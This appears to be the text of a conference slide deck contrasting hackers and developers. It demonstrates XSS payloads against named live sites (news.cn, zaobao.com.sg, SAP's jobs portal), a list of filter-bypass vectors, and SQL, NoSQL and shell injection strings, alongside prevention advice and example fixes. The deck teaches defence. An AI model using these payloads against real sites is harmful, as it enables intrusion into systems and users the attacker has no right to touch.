Soumyasanto Sen, #sitWDF
Hackers versus Developers
The GAME is ON
Introduction
Player 1: Hackers
Expert: Skillful, with a detailed understanding of some area, often scarily deeply.
Unsocial: Don't want to come out of the shell.
Breaker: Hack apps.
Cool: People think that they are cool, and they think they are awesome.
Super Power: They believe that they can be "Masters of the Universe".
VS
Player 2: Developers
Controller: Can use lots of systems and languages and get them talking to each other.
Social: True and broad professionals; work with people and communicate well.
Builder: Create apps.
Boring: There are other, more important things in life than just coding.
Super Power: They believe they can change this world.
Hacking looks ‘Simple’
XSS - Cross Site Scripting
JavaScript's built-in function(s)
decodeURI: decodes an encoded URI
http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xxxxxxxx'yyyyy</img
Possibilities:
• '-confirm(1)-'
• '-confirm`1`-'
http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-confirm(1)-'
var topic = decodeURI('');confirm(1);('');
var topic = decodeURI('');confirm(1);//');
Hacking looks ‘Simple’
XSS - Cross Site Scripting
JavaScript's built-in function(s)
replace (JS String replace method): returns a new string in which a matched pattern has been replaced
http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img
Possibilities:
http://www.zaobao.com.sg/search/site/"-confirm(1)-"
http://www.zaobao.com.sg/search/site/");confirm(1);("
http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
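Both slides above come down to one pattern: a URL parameter is spliced into a JavaScript string literal inside an inline script, so a quote in the input ends the literal. The following is an added example (not code from the deck) that puts that pattern next to a context-aware encoding for the JavaScript-string context and runs both under Node.js with a stub confirm(); the payload is the `'-confirm(1)-'` from the slides.

```javascript
// Vulnerable pattern from the slides: the query parameter lands inside a
// single-quoted JS string literal. A quote in the input terminates the
// literal and whatever follows is parsed and executed as code.
function renderTopicUnsafe(topic) {
  return "var topic = decodeURI('" + topic + "');";
}

// Encoding for the JavaScript-string context: JSON.stringify produces a
// valid double-quoted JS literal with quotes, backslashes and control
// characters escaped. On top of that, <, >, &, U+2028 and U+2029 are written
// as \uXXXX so the literal can never contain "</script>", which would end the
// HTML <script> element no matter how well the JavaScript itself is escaped.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

function renderTopicSafe(topic) {
  return "var topic = decodeURI(" + jsStringLiteral(topic) + ");";
}

// Stand-in for the browser: runs the rendered inline script with a stub
// confirm() that records whether it was ever called, and returns the value
// the script assigned to `topic`.
function simulateBrowser(script) {
  let confirmCalled = false;
  const confirmStub = () => { confirmCalled = true; return true; };
  const topic = new Function("confirm", script + "\nreturn topic;")(confirmStub);
  return { confirmCalled, topic };
}

// Constructed input: the payload shown on the slides.
const PAYLOAD = "'-confirm(1)-'";

console.log(renderTopicUnsafe(PAYLOAD));                  // quote breaks out of the literal
console.log(simulateBrowser(renderTopicUnsafe(PAYLOAD))); // confirmCalled: true
console.log(renderTopicSafe(PAYLOAD));                    // input stays one string literal
console.log(simulateBrowser(renderTopicSafe(PAYLOAD)));   // confirmCalled: false
```

The same encoder covers the `</script><script>alert(1)</script>` probe from the SuccessFactors slides, because `<` and `>` never appear raw in the output.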
Easy Rules
Preventions
• XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
• HTML5 Security Cheat Sheet
• Secure Coding Practice Guidelines
• Use clean URLs: https://www.site.com/news.php?id=1337 is far more tempting than https://www.site.com/news/some-news-or-today
• Sanitize inputs: a must against XSS
• Control access: http://www.site.com/phpmyadmin gave us access to the complete database! No injection, nothing.
• Validate input.
• Use white-listing.
• Switch off error display.
Easy Rules
Remember
“Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.”
(Developers love their code, just like it's their child.)
“Do not trust anything ever, especially when it comes to user input.”
“Security is about layers. It has to be, because no single layer can be guaranteed to actually be secure.”
Security is nothing but an ILLUSION.
Hacking looks ‘Simple’
Even for
Breaking SuccessFactors's XSS Filter
'-confirm(1)-' was enough to break SAP SuccessFactors's XSS filter, leaving hundreds of web applications vulnerable ...
https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img
Possibilities:
• </script><script>alert(1)</script>
• '-confirm(1)-'
https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script>
Next Vector: <img src=x onerror=alert(1)>
Next Vector: <img src=x onerror=confirm(1)>
Next Vector: <a href=javascript:confirm(1)>click</a>
Next Vectors:
• <p onmouseover=prompt(1)>IamParagraph</p>
• <details ontoggle=confirm(1)>
• <input type=search onsearch=confirm(1)>
Easy Filtering
Context Based Filtering
Protection against JavaScript execution via a URL, e.g. an img's src and/or an anchor's href attribute: implementation of `urlContextCleaner()`
Easy Filtering
External HTML Sanitizer
https://developers.google.com/caja/
The Caja project includes an HTML sanitizer.
Example:
<script src="html-sanitizer-minified.js"></script>
<script>
// URL policy: keep only http(s) URLs; anything else (javascript:, data:, ...) is dropped
function urlX(url) { if (/^https?:\/\//.test(url)) { return url; } }
// ID policy: pass element ids through unchanged
function idX(id) { return id; }
// "<\/script>" is escaped so the literal cannot close this inline <script> element
alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"><script src="http://dfd"><\/script>', urlX, idX))
</script>
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
Hacking in Node.js
Of course, XSS
Improper parsing of nested tags and incomplete filtering of javascript: URIs
<s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s>
<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>
(With any encoding)
Server Side JavaScript Injection
Simple JS command:
response.end("Ended Response");
[pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
SQL and NoSQL Injection
Classic SQL injection bypass:
SELECT * FROM users WHERE username = '$username' AND password = '$password'
(SELECT * FROM users WHERE username = '' or 1=1--' AND password = '')
select author from books where id=$id -> (select author from books where id=2 or 1=1)
Statement stmt = conn.createStatement();
stmt.execute("INSERT INTO students VALUES('" + user + "')");
(Robert'); DROP TABLE students; --)
db.users.find({username: username, password: password}); (NoSQL)
{ "username": {"$gt": ""}, "password": {"$gt": ""} }
Secure Node.js
Protection
XSS Prevention
• Sanitize untrusted HTML
http://jsxss.com/en/index.html
https://github.com/theSmaw/Caja-HTML-Sanitizer
https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project
SSJSI Prevention
• Substitute eval() with JSON.parse(): JSON.parse only accepts data, so the input can no longer inject code
• Use child_process.execFile or child_process.spawn instead of child_process.exec: no shell is involved, so shell metacharacters in user input are not interpreted
SQL and NoSQL Injection Prevention
• Use parameterized SQL
var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {});
• PreparedStatements prevent SQL injection
PreparedStatement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)");
stmt.setString(1, user);
stmt.execute();
• Use the $in operator to match values (NoSQL)
db.users.find({user: { $in: [user] }, pass: { $in: [pass] }});
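An added example (not code from the deck) showing why the `{"$gt": ""}` body from the injection slide matches every user in the original find() call, and the two defences from this slide: the $in wrapping shown above plus a type check on the request body. The matcher is a constructed stand-in for MongoDB's find() that models only $gt and $in; the user records are constructed too.

```javascript
// Constructed user collection. Real code stores a password hash and checks
// it after looking the user up by name; the plaintext match follows the slide.
const USERS = [
  { user: "alice", pass: "correct horse" },
  { user: "bob", pass: "battery staple" },
];

// Minimal filter evaluation: a plain value is an equality match; an object
// carrying $gt or $in is an operator. This mirrors how MongoDB interprets the
// values that the slide's find() builds straight from the request body.
function fieldMatches(actual, expected) {
  if (expected !== null && typeof expected === "object") {
    if ("$gt" in expected) return actual > expected.$gt;
    if ("$in" in expected) return expected.$in.includes(actual);
    return false; // any other object never equals a string field
  }
  return actual === expected;
}

function find(filter) {
  return USERS.filter((doc) =>
    Object.keys(filter).every((k) => fieldMatches(doc[k], filter[k])));
}

// Vulnerable: request body values are used as query values verbatim, so an
// operator object in the body becomes an operator in the query.
function loginUnsafe(body) {
  return find({ user: body.username, pass: body.password });
}

// Fix from the slide: $in turns each value into a literal to compare
// against, so an operator object is compared as a value and matches nothing.
function loginWithIn(body) {
  return find({ user: { $in: [body.username] }, pass: { $in: [body.password] } });
}

// Belt and braces: reject anything that is not a string before it reaches
// the query at all (a JSON body can carry objects, arrays and numbers).
function loginStrict(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    throw new TypeError("credentials must be strings");
  }
  return loginWithIn(body);
}

// Constructed bodies: a normal login and the {"$gt": ""} bypass from the slide.
const NORMAL_BODY = { username: "alice", password: "correct horse" };
const BYPASS_BODY = { username: { $gt: "" }, password: { $gt: "" } };

console.log(loginUnsafe(BYPASS_BODY).length);  // 2: every user "matches"
console.log(loginWithIn(BYPASS_BODY).length);  // 0
console.log(loginStrict(NORMAL_BODY).length);  // 1
```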
Good Cause
Positive Side
• Social good: finding solutions for social benefit, operations and emergencies
• Penetration testing: finding vulnerabilities that an attacker could exploit
• Open source: much open-source code is produced, tested and improved by hackers, often at hackathons
Top 10 fears of 2015
Negative Side
• Corruption of government officials (58.0%)
• Cyber-terrorism (44.8%)
• Corporate tracking of personal information (44.6%)
• Terrorist attacks (44.4%)
• Government tracking of personal information (41.4%)
• Bio-warfare (40.9%)
• Identity theft (39.6%)
• Economic collapse (39.2%)
• Running out of money in the future (37.4%)
• Credit card fraud (36.9%)
Source: Chapman University
Make a Difference
Source: Scott Hanselman
Who is the Winner?
A "Hacker" is a state of mind.
A "Developer" is a state of function.
Choice is Yours
Thank You
Soumyasanto Sen
@soumyasanto
